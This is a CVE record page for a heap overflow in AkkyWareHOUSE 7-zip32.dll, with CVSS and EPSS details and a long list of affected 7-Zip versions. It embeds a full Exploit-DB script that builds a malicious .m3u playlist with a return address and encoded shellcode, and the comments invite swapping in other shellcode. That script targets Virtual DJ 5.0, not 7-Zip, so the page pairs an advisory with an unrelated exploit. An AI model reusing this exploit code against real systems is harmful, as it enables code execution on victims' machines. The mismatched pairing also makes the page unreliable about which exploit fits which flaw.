Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Stack consumption vulnerability in AkkyWareHOUSE 7-zip32.dll before 4.42.00.04, as derived from Igor Pavlov 7-Zip before 4.53 beta, allows user-assisted remote attackers to execute arbitrary code via a long filename in an archive, leading to a heap-based buffer overflow.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Uncontrolled Resource Consumption The product does not properly control the allocation and maintenance of a limited resource. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 30565
Publication date : 2007-09-03 22h00 +00:00
Author : miyy3t
EDB Verified : Yes
source: https://www.securityfocus.com/bid/25545/info
AkkyWareHOUSE 7-zip32.dll is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.
Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Versions prior to 7-zip32.dll 4.42.00.04 are vulnerable.
#Virtual DJ 5.0 Local Buffer OverFlow
#224 bytes available for shellcode,, you can replace it with you
favourite one,,
#ret addr -> 0x7199403D jmp esp in mswsock.dll Winxp sp0
#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode
-224]
#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,,
Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub
http://metasploit.com
shellcode =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84"
shellcode+=
"\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d"
shellcode+=
"\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91"
shellcode+=
"\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5"
shellcode+=
"\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe"
shellcode+=
"\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc"
shellcode+=
"\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53"
shellcode+=
"\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0"
shellcode+=
"\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc"
shellcode+=
"\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0"
shellcode+= "\xe1\xd1\xfe\xd8"
bof = "A"*484+"\x3D\x40\x99\x71"+"\x90"*10+shellcode
file = open('c:\/xploit.m3u','w+')
file.write("#EXTM3U\n");
file.write("#EXTINF:0,TITLE\n")
file.write("C:/")
file.write(bof)
file.close()
print "Exploit generated in c:\/xploit.m3u ...now open it with virtual
dj !! "
Products Mentioned
Configuraton 0
7-zip>>7-zip >> Version To (including) 4.42
- 7-zip>>7-zip >> Version - (Open CPE detail)
- 7-zip>>7-zip >> Version 3.13 (Open CPE detail)
- 7-zip>>7-zip >> Version 3.13 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.20 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.20 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.23 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.23 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.24 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.24 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.25 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.25 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.26 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.26 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.27 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.27 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.28 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.28 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.29 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.29 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.30 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.30 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.31 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.31 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.32 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.32 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.33 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.33 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.34 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.34 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.35 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.35 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.36 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.36 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.37 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.37 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.38 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.38 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.39 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.39 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.40 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.40 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.41 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.41 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.42 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.42 (Open CPE detail)
7-zip>>7-zip >> Version 4.43
- 7-zip>>7-zip >> Version 4.43 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.43 (Open CPE detail)
7-zip>>7-zip >> Version 4.44
- 7-zip>>7-zip >> Version 4.44 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.44 (Open CPE detail)
7-zip>>7-zip >> Version 4.45
- 7-zip>>7-zip >> Version 4.45 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.45 (Open CPE detail)
7-zip>>7-zip >> Version 4.46
- 7-zip>>7-zip >> Version 4.46 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.46 (Open CPE detail)
7-zip>>7-zip >> Version 4.47
- 7-zip>>7-zip >> Version 4.47 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.47 (Open CPE detail)
7-zip>>7-zip >> Version 4.48
- 7-zip>>7-zip >> Version 4.48 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.48 (Open CPE detail)
7-zip>>7-zip >> Version 4.49
- 7-zip>>7-zip >> Version 4.49 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.49 (Open CPE detail)
7-zip>>7-zip >> Version 4.50
- 7-zip>>7-zip >> Version 4.50 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.50 (Open CPE detail)
7-zip>>7-zip >> Version 4.51
- 7-zip>>7-zip >> Version 4.51 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.51 (Open CPE detail)
7-zip>>7-zip >> Version 4.52
- 7-zip>>7-zip >> Version 4.52 (Open CPE detail)
- 7-zip>>7-zip >> Version 4.52 (Open CPE detail)
References
http://sourceforge.net/project/shownotes.php?release_id=535160&group_id=14481
Tags : x_refsource_MISC
Tags : x_refsource_MISC
